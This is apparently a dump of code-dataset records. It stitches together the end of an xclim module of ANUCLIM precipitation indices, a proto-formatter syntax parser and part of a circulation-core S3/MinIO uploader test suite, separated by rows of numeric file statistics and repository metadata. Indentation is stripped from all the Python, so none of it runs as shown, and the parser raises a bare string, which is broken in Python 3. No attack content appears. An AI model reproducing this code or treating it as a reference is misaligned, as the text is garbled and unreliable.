According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
try:
oper = _np_ops[op]
except KeyError:
raise NotImplementedError(
f'Unknown operation "{op}" ; not one of "wettest" or "driest"'
)
out = select_resample_op(pr_qrt, oper, freq)
out.attrs["units"] = pr_qrt.units
return out
@declare_units(pr="[precipitation]", tas="[temperature]")
def prcptot_warmcold_quarter(
pr: xarray.DataArray,
tas: xarray.DataArray,
op: str = None,
src_timestep: str = None,
freq: str = "YS",
) -> xarray.DataArray:
r"""ANUCLIM Total precipitation of warmest/coldest quarter.
The warmest (or coldest) quarter of the year is determined, and the total
precipitation of this period is calculated. If the input data frequency is daily ("D) or weekly ("W"), quarters
are defined as 13 week periods, otherwise are 3 months.
Parameters
----------
pr : xarray.DataArray
Total precipitation rate at daily, weekly, or monthly frequency.
tas : xarray.DataArray
Mean temperature at daily, weekly, or monthly frequency.
op : {'warmest', 'coldest'}
Operation to perform: 'warmest' calculate for the warmest quarter ; 'coldest' calculate for the coldest quarter.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray : [mm]
Total precipitation values of the {op} quarter of each year
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
# determine input data frequency
tas_qrt = _to_quarter(src_timestep, tas=tas)
# returns mm values
pr_qrt = _to_quarter(src_timestep, pr=pr)
xr_op = _xr_argops[op]
out = _from_other_arg(criteria=tas_qrt, output=pr_qrt, op=xr_op, freq=freq)
out.attrs = pr_qrt.attrs
return out
@declare_units(pr="[precipitation]")
def prcptot(
pr: xarray.DataArray, src_timestep: str = None, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM Accumulated total precipitation.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well.
"""
pram = rate2amount(pr)
return pram.resample(time=freq).sum(dim="time", keep_attrs=True)
# FIXME: src_timestep is not used here.
@declare_units(pr="[precipitation]")
def prcptot_wetdry_period(
pr: xarray.DataArray, *, op: str, src_timestep: str, freq: str = "YS"
) -> xarray.DataArray:
r"""ANUCLIM precipitation of the wettest/driest day, week, or month, depending on the time step.
Parameters
----------
pr : xarray.DataArray
Total precipitation flux [mm d-1], [mm week-1], [mm month-1] or similar.
op : {'wettest', 'driest'}
Operation to perform : 'wettest' calculate wettest period ; 'driest' calculate driest period.
src_timestep : {'D', 'W', 'M'}
Input data time frequency - One of daily, weekly or monthly.
freq : str
Resampling frequency.
Returns
-------
xarray.DataArray, [length]
Total precipitation of the {op} period.
Notes
-----
According to the ANUCLIM user-guide https://fennerschool.anu.edu.au/files/anuclim61.pdf (ch. 6), input
values should be at a weekly (or monthly) frequency. However, the xclim.indices implementation here will calculate
the result with input data with daily frequency as well. As such weekly or monthly input values, if desired,
should be calculated prior to calling the function.
"""
pram = rate2amount(pr)
if op == "wettest":
return pram.resample(time=freq).max(dim="time", keep_attrs=True)
if op == "driest":
return pram.resample(time=freq).min(dim="time", keep_attrs=True)
raise NotImplementedError(
f'Unknown operation "{op}" ; op parameter but be one of "wettest" or "driest"'
)
def _anuclim_coeff_var(arr: xarray.DataArray) -> xarray.DataArray:
"""Calculate the annual coefficient of variation for ANUCLIM indices."""
std = arr.resample(time="YS").std(dim="time")
mu = arr.resample(time="YS").mean(dim="time")
return std / mu
def _from_other_arg(
criteria: xarray.DataArray, output: xarray.DataArray, op, freq: str
) -> xarray.DataArray:
"""Pick values from output based on operation returning an index from criteria.
Parameters
----------
criteria : DataArray
Series on which operation returning index is applied.
output : DataArray
Series to be indexed.
op : func
Function returning an index, for example np.argmin, np.argmax, np.nanargmin, np.nanargmax.
freq : str
Temporal grouping.
Returns
-------
DataArray
Output values where criteria is met at the given frequency.
"""
ds = xarray.Dataset(data_vars={"criteria": criteria, "output": output})
dim = "time"
def get_other_op(dataset):
all_nans = dataset.criteria.isnull().all(dim=dim)
index = op(dataset.criteria.where(~all_nans, 0), dim=dim)
return lazy_indexing(dataset.output, index=index, dim=dim).where(~all_nans)
return ds.resample(time=freq).map(get_other_op)
def _to_quarter(
freq: str,
pr: Optional[xarray.DataArray] = None,
tas: Optional[xarray.DataArray] = None,
) -> xarray.DataArray:
"""Convert daily, weekly or monthly time series to quarterly time series according to ANUCLIM specifications."""
if freq.upper().startswith("D"):
if tas is not None:
tas = tg_mean(tas, freq="7D")
if pr is not None:
# Accumulate on a week
# Ensure units are back to a "rate" for rate2amount below
pr = convert_units_to(precip_accumulation(pr, freq="7D"), "mm")
pr.attrs["units"] = "mm/week"
freq = "W"
if freq.upper().startswith("W"):
window = 13
elif freq.upper().startswith("M"):
window = 3
else:
raise NotImplementedError(
f'Unknown input time frequency "{freq}": must be one of "D", "W" or "M".'
)
if tas is not None:
tas = ensure_chunk_size(tas, time=np.ceil(window / 2))
if pr is not None:
pr = ensure_chunk_size(pr, time=np.ceil(window / 2))
if pr is not None:
pram = rate2amount(pr)
out = pram.rolling(time=window, center=False).sum()
out.attrs = pr.attrs
out.attrs["units"] = pram.units
if tas is not None:
out = tas.rolling(time=window, center=False).mean(skipna=False)
out.attrs = tas.attrs
out = ensure_chunk_size(out, time=-1)
return out
| 35.190391
| 128
| 0.674369
| 2,637
| 19,777
| 4.972696
| 0.125142
| 0.062915
| 0.038893
| 0.034775
| 0.662396
| 0.605735
| 0.579883
| 0.545794
| 0.530008
| 0.505224
| 0
| 0.005098
| 0.216464
| 19,777
| 561
| 129
| 35.253119
| 0.84112
| 0.602063
| 0
| 0.331683
| 0
| 0.004951
| 0.112171
| 0.019968
| 0
| 0
| 0
| 0.001783
| 0
| 1
| 0.064356
| false
| 0
| 0.044554
| 0
| 0.178218
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
137fdb8af310be2f7cdaeb72968e537c0108415a
| 888
|
py
|
Python
|
src/proto_formatter/syntax_parser.py
|
YiXiaoCuoHuaiFenZi/proto-formatter
|
ac8c913a8c3854e840aa4f015c026e58ee023b0b
|
[
"MIT"
] | null | null | null |
src/proto_formatter/syntax_parser.py
|
YiXiaoCuoHuaiFenZi/proto-formatter
|
ac8c913a8c3854e840aa4f015c026e58ee023b0b
|
[
"MIT"
] | null | null | null |
src/proto_formatter/syntax_parser.py
|
YiXiaoCuoHuaiFenZi/proto-formatter
|
ac8c913a8c3854e840aa4f015c026e58ee023b0b
|
[
"MIT"
] | null | null | null |
from .comment import CommentParser
from .protobuf import Protobuf
from .proto_structures import Syntax
class SyntaxParser():
@classmethod
def parse_and_add(cls, proto_obj: Protobuf, line, top_comment_list):
if proto_obj.syntax is not None:
raise 'multiple syntax detected!'
proto_obj.syntax = cls.parse_syntax(line, top_comment_list)
@classmethod
def parse_syntax(cls, line, top_comment_list):
value = cls._get_syntax_value(line)
comments = CommentParser.create_comment(line, top_comment_list)
syntax = Syntax(value, comments)
return syntax
@classmethod
def _get_syntax_value(cls, line):
line = line.strip().replace(' ', '')
lindex = len('syntax=')
rindex = line.index(';')
value = line[lindex:rindex].strip().replace('"', "").replace("'", "")
return value
| 29.6
| 77
| 0.657658
| 104
| 888
| 5.394231
| 0.365385
| 0.049911
| 0.099822
| 0.128342
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230856
| 888
| 29
| 78
| 30.62069
| 0.821376
| 0
| 0
| 0.136364
| 0
| 0
| 0.040541
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0
| 0.136364
| 0
| 0.409091
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
13829c0823e4f1af5270d26df1460fb75ccc8a6b
| 47,884
|
py
|
Python
|
tests/test_s3.py
|
tdilauro/circulation-core
|
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
|
[
"Apache-2.0"
] | 1
|
2021-11-16T00:58:43.000Z
|
2021-11-16T00:58:43.000Z
|
tests/test_s3.py
|
tdilauro/circulation-core
|
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
|
[
"Apache-2.0"
] | 16
|
2021-05-17T19:24:47.000Z
|
2021-12-15T13:57:34.000Z
|
tests/test_s3.py
|
tdilauro/circulation-core
|
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
|
[
"Apache-2.0"
] | 1
|
2021-05-12T19:11:52.000Z
|
2021-05-12T19:11:52.000Z
|
# encoding: utf-8
import functools
import os
from urllib.parse import urlsplit
import boto3
import botocore
import pytest
from botocore.exceptions import BotoCoreError, ClientError
from mock import MagicMock
from parameterized import parameterized
from ..mirror import MirrorUploader
from ..model import (
DataSource,
ExternalIntegration,
Hyperlink,
Identifier,
Representation,
create,
)
from ..s3 import (
MinIOUploader,
MinIOUploaderConfiguration,
MockS3Client,
MultipartS3Upload,
S3AddressingStyle,
S3Uploader,
S3UploaderConfiguration,
)
from ..testing import DatabaseTest
from ..util.datetime_helpers import datetime_utc, utc_now
class S3UploaderTest(DatabaseTest):
def _integration(self, **settings):
"""Create and configure a simple S3 integration."""
integration = self._external_integration(
ExternalIntegration.S3, ExternalIntegration.STORAGE_GOAL, settings=settings
)
integration.username = settings.get("username", "username")
integration.password = settings.get("password", "password")
return integration
def _add_settings_value(self, settings, key, value):
"""Adds a value to settings dictionary
:param settings: Settings dictionary
:type settings: Dict
:param key: Key
:type key: string
:param value: Value
:type value: Any
:return: Updated settings dictionary
:rtype: Dict
"""
if value:
if settings:
settings[key] = value
else:
settings = {key: value}
return settings
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
:param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
:type: Optional[Dict]
:return: New intance of S3 uploader
:rtype: S3Uploader
"""
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_REGION, region
)
settings = self._add_settings_value(
settings, S3UploaderConfiguration.S3_ADDRESSING_STYLE, addressing_style
)
integration = self._integration(**settings)
uploader_class = uploader_class or S3Uploader
return uploader_class(integration, client_class=client_class)
class S3UploaderIntegrationTest(S3UploaderTest):
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL = os.environ.get(
"SIMPLIFIED_TEST_MINIO_ENDPOINT_URL", "http://localhost:9000"
)
SIMPLIFIED_TEST_MINIO_USER = os.environ.get(
"SIMPLIFIED_TEST_MINIO_USER", "minioadmin"
)
SIMPLIFIED_TEST_MINIO_PASSWORD = os.environ.get(
"SIMPLIFIED_TEST_MINIO_PASSWORD", "minioadmin"
)
_, SIMPLIFIED_TEST_MINIO_HOST, _, _, _ = urlsplit(
SIMPLIFIED_TEST_MINIO_ENDPOINT_URL
)
minio_s3_client = None
"""boto3 client connected to locally running MinIO instance"""
s3_client_class = None
"""Factory function used for creating a boto3 client inside S3Uploader"""
@classmethod
def setup_class(cls):
"""Initializes the test suite by creating a boto3 client set up with MinIO credentials"""
super(S3UploaderIntegrationTest, cls).setup_class()
cls.minio_s3_client = boto3.client(
"s3",
aws_access_key_id=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER,
aws_secret_access_key=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
cls.s3_client_class = functools.partial(
boto3.client,
endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL,
)
def teardown_method(self):
"""Deinitializes the test suite by removing all the buckets from MinIO"""
super(S3UploaderTest, self).teardown_method()
response = self.minio_s3_client.list_buckets()
for bucket in response["Buckets"]:
bucket_name = bucket["Name"]
response = self.minio_s3_client.list_objects(Bucket=bucket_name)
for object in response.get("Contents", []):
object_key = object["Key"]
self.minio_s3_client.delete_object(Bucket=bucket_name, Key=object_key)
self.minio_s3_client.delete_bucket(Bucket=bucket_name)
def _create_s3_uploader(
self,
client_class=None,
uploader_class=None,
region=None,
addressing_style=None,
**settings
):
"""Creates a new instance of S3 uploader
:param client_class: (Optional) Custom class to be used instead of boto3's client class
:type client_class: Optional[Type]
:param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader
:type uploader_class: Optional[Type]
:param region: (Optional) S3 region
:type region: Optional[string]
:param addressing_style: (Optional) S3 addressing style
:type addressing_style: Optional[string]
:param settings: Kwargs used for initializing an external integration
:type: Optional[Dict]
:return: New intance of S3 uploader
:rtype: S3Uploader
"""
if settings and "username" not in settings:
self._add_settings_value(
settings, "username", self.SIMPLIFIED_TEST_MINIO_USER
)
if settings and "password" not in settings:
self._add_settings_value(
settings, "password", self.SIMPLIFIED_TEST_MINIO_PASSWORD
)
if not client_class:
client_class = self.s3_client_class
return super(S3UploaderIntegrationTest, self)._create_s3_uploader(
client_class, uploader_class, region, addressing_style, **settings
)
class TestS3Uploader(S3UploaderTest):
def test_names(self):
# The NAME associated with this class must be the same as its
# key in the MirrorUploader implementation registry, and it's
# better if it's the same as the name of the external
# integration.
assert S3Uploader.NAME == ExternalIntegration.S3
assert (
S3Uploader == MirrorUploader.IMPLEMENTATION_REGISTRY[ExternalIntegration.S3]
)
def test_instantiation(self):
integration = self._external_integration(
ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL
)
integration.username = "your-access-key"
integration.password = "your-secret-key"
integration.setting(
S3UploaderConfiguration.URL_TEMPLATE_KEY
).value = "a transform"
uploader = MirrorUploader.implementation(integration)
assert True == isinstance(uploader, S3Uploader)
# The URL_TEMPLATE_KEY setting becomes the .url_transform
# attribute on the S3Uploader object.
assert "a transform" == uploader.url_transform
@parameterized.expand(
[
("empty_credentials", None, None),
("empty_string_credentials", "", ""),
("non_empty_string_credentials", "username", "password"),
]
)
def test_initialization(self, name, username, password):
# Arrange
settings = {"username": username, "password": password}
integration = self._external_integration(
ExternalIntegration.S3,
goal=ExternalIntegration.STORAGE_GOAL,
settings=settings,
)
client_class = MagicMock()
# Act
S3Uploader(integration, client_class=client_class)
# Assert
assert client_class.call_count == 2
service_name = client_class.call_args_list[0].args[0]
region_name = client_class.call_args_list[0].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[0].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[0].kwargs[
"aws_secret_access_key"
]
config = client_class.call_args_list[0].kwargs["config"]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == None
assert aws_secret_access_key == None
assert config.signature_version == botocore.UNSIGNED
assert (
config.s3["addressing_style"]
== S3UploaderConfiguration.S3_DEFAULT_ADDRESSING_STYLE
)
service_name = client_class.call_args_list[1].args[0]
region_name = client_class.call_args_list[1].kwargs["region_name"]
aws_access_key_id = client_class.call_args_list[1].kwargs["aws_access_key_id"]
aws_secret_access_key = client_class.call_args_list[1].kwargs[
"aws_secret_access_key"
]
assert service_name == "s3"
assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION
assert aws_access_key_id == (username if username != "" else None)
assert aws_secret_access_key == (password if password != "" else None)
assert "config" not in client_class.call_args_list[1].kwargs
def test_custom_client_class(self):
"""You can specify a client class to use instead of boto3.client."""
integration = self._integration()
uploader = S3Uploader(integration, MockS3Client)
assert isinstance(uploader.client, MockS3Client)
def test_get_bucket(self):
buckets = {
S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "banana",
S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "bucket",
}
buckets_plus_irrelevant_setting = dict(buckets)
buckets_plus_irrelevant_setting["not-a-bucket-at-all"] = "value"
uploader = self._create_s3_uploader(**buckets_plus_irrelevant_setting)
# This S3Uploader knows about the configured buckets. It
# wasn't informed of the irrelevant 'not-a-bucket-at-all'
# setting.
assert buckets == uploader.buckets
# get_bucket just does a lookup in .buckets
uploader.buckets["foo"] = object()
result = uploader.get_bucket("foo")
assert uploader.buckets["foo"] == result
@parameterized.expand(
[
(
"s3_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://dummy.s3.amazonaws.com/dummy",
None,
),
(
"s3_path_style_url_with_path_without_slash",
"a-bucket",
"a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_path_style_dummy_url_with_path_without_slash",
"dummy",
"dummy",
"https://s3.amazonaws.com/dummy/dummy",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.amazonaws.com/a-path",
None,
),
(
"s3_path_style_url_with_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.amazonaws.com/a-bucket/a-path",
None,
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://a-bucket.s3.us-east-2.amazonaws.com/a-path",
"us-east-2",
),
(
"s3_path_style_url_with_custom_region_and_path_without_slash",
"a-bucket",
"a-path",
"https://s3.us-east-2.amazonaws.com/a-bucket/a-path",
"us-east-2",
S3AddressingStyle.PATH.value,
),
(
"s3_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://a-bucket.s3.us-east-3.amazonaws.com/a-path",
"us-east-3",
),
(
"s3_path_style_url_with_custom_region_and_path_with_slash",
"a-bucket",
"/a-path",
"https://s3.us-east-3.amazonaws.com/a-bucket/a-path",
"us-east-3",
S3AddressingStyle.PATH.value,
),
(
"custom_http_url_and_path_without_slash",
"http://a-bucket.com/",
"a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"http://a-bucket.com/",
"/a-path",
"http://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_without_slash",
"https://a-bucket.com/",
"a-path",
"https://a-bucket.com/a-path",
None,
),
(
"custom_http_url_and_path_with_slash",
"https://a-bucket.com/",
"/a-path",
"https://a-bucket.com/a-path",
None,
),
]
)
def test_url(
self, name, bucket, path, expected_result, region=None, addressing_style=None
):
# Arrange
uploader = self._create_s3_uploader(
region=region, addressing_style=addressing_style
)
# Act
result = uploader.url(bucket, path)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"implicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
),
(
"implicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
None,
"us-east-2",
),
(
"explicit_s3_url_template",
"bucket",
"the key",
"https://bucket.s3.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
),
(
"explicit_s3_url_template_with_custom_region",
"bucket",
"the key",
"https://bucket.s3.us-east-2.amazonaws.com/the%20key",
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT,
"us-east-2",
),
(
"http_url_template",
"bucket",
"the këy",
"http://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTP,
),
(
"https_url_template",
"bucket",
"the këy",
"https://bucket/the%20k%C3%ABy",
S3UploaderConfiguration.URL_TEMPLATE_HTTPS,
),
]
)
def test_final_mirror_url(
self, name, bucket, key, expected_result, url_transform=None, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
if url_transform:
uploader.url_transform = url_transform
# Act
result = uploader.final_mirror_url(bucket, key)
# Assert
if not url_transform:
assert (
S3UploaderConfiguration.URL_TEMPLATE_DEFAULT == uploader.url_transform
)
assert result == expected_result
def test_key_join(self):
"""Test the code used to build S3 keys from parts."""
parts = ["Gutenberg", b"Gutenberg ID", 1234, "Die Flügelmaus+.epub"]
assert (
"Gutenberg/Gutenberg%20ID/1234/Die%20Fl%C3%BCgelmaus%2B.epub"
== S3Uploader.key_join(parts)
)
@parameterized.expand(
[
(
"with_gutenberg_cover_generator_data_source",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/",
),
(
"with_overdrive_data_source",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/",
),
(
"with_overdrive_data_source_and_scaled_size",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/",
300,
),
(
"with_gutenberg_cover_generator_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.GUTENBERG_COVER_GENERATOR,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/",
None,
"us-east-3",
),
(
"with_overdrive_data_source_and_scaled_size_and_custom_region",
"test-book-covers-s3-bucket",
DataSource.OVERDRIVE,
"https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/",
300,
"us-east-3",
),
]
)
def test_cover_image_root(
self,
name,
bucket,
data_source_name,
expected_result,
scaled_size=None,
region=None,
):
# Arrange
uploader = self._create_s3_uploader(region=region)
data_source = DataSource.lookup(self._db, data_source_name)
# Act
result = uploader.cover_image_root(bucket, data_source, scaled_size=scaled_size)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_default_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.amazonaws.com/",
),
(
"with_custom_region",
"test-open-access-s3-bucket",
"https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/",
"us-east-3",
),
]
)
def test_content_root(self, name, bucket, expected_result, region=None):
# Arrange
uploader = self._create_s3_uploader(region=region)
# Act
result = uploader.content_root(bucket)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"s3_url",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/",
),
(
"s3_url_with_custom_region",
"test-marc-s3-bucket",
"SHORT",
"https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/",
"us-east-2",
),
("custom_http_url", "http://my-feed/", "SHORT", "http://my-feed/SHORT/"),
("custom_https_url", "https://my-feed/", "SHORT", "https://my-feed/SHORT/"),
]
)
def test_marc_file_root(
self, name, bucket, library_name, expected_result, region=None
):
# Arrange
uploader = self._create_s3_uploader(region=region)
library = self._library(short_name=library_name)
# Act
result = uploader.marc_file_root(bucket, library)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_identifier",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub",
),
(
"with_custom_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
"pdf",
),
(
"with_custom_dotted_extension",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf",
".pdf",
),
(
"with_custom_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub",
None,
DataSource.UNGLUE_IT,
),
(
"with_custom_title",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub",
None,
None,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
),
(
"with_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
),
(
"with_protected_access_and_custom_extension_and_title_and_data_source_and_region",
{S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: "thebooks"},
"ABOOK",
"https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf",
".pdf",
DataSource.UNGLUE_IT,
"On Books",
"us-east-3",
False,
),
]
)
def test_book_url(
self,
name,
buckets,
identifier,
expected_result,
extension=None,
data_source_name=None,
title=None,
region=None,
open_access=True,
):
# Arrange
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
parameters = {"identifier": identifier, "open_access": open_access}
if extension:
parameters["extension"] = extension
if title:
parameters["title"] = title
if data_source_name:
data_source = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
parameters["data_source"] = data_source
# Act
result = uploader.book_url(**parameters)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"without_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
),
(
"without_scaled_size_and_with_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/filename",
None,
"us-east-3",
),
(
"with_scaled_size",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
),
(
"with_scaled_size_and_custom_region",
{S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "thecovers"},
DataSource.UNGLUE_IT,
"ABOOK",
"filename",
"https://thecovers.s3.us-east-3.amazonaws.com/scaled/601/unglue.it/Gutenberg%20ID/ABOOK/filename",
601,
"us-east-3",
),
]
)
def test_cover_image_url(
self,
name,
buckets,
data_source_name,
identifier,
filename,
expected_result,
scaled_size=None,
region=None,
):
# identifier = self._identifier(foreign_id="ABOOK")
# buckets = {S3Uploader.BOOK_COVERS_BUCKET_KEY : 'thecovers'}
# uploader = self._uploader(**buckets)
# m = uploader.cover_image_url
#
# unglueit = DataSource.lookup(self._db, DataSource.UNGLUE_IT)
# identifier = self._identifier(foreign_id="ABOOK")
# eq_('https://s3.amazonaws.com/thecovers/scaled/601/unglue.it/Gutenberg+ID/ABOOK/filename',
# m(unglueit, identifier, "filename", scaled_size=601))
# Arrange
data_source = DataSource.lookup(self._db, data_source_name)
identifier = self._identifier(foreign_id=identifier)
uploader = self._create_s3_uploader(region=region, **buckets)
# Act
result = uploader.cover_image_url(
data_source, identifier, filename, scaled_size=scaled_size
)
# Assert
assert result == expected_result
@parameterized.expand(
[
(
"with_s3_bucket_and_end_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 1, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00/Lane.mrc",
),
(
"with_s3_bucket_and_end_time_and_start_time",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
"https://marc.s3.amazonaws.com/SHORT/2020-01-01%2000%3A00%3A00%2B00%3A00-2020-01-02%2000%3A00%3A00%2B00%3A00/Lane.mrc",
datetime_utc(2020, 1, 1, 0, 0, 0),
),
(
"with_s3_bucket_and_end_time_and_start_time_and_custom_region",
"marc",
"SHORT",
"Lane",
datetime_utc(2020, 1, 2, 0, 0, 0),
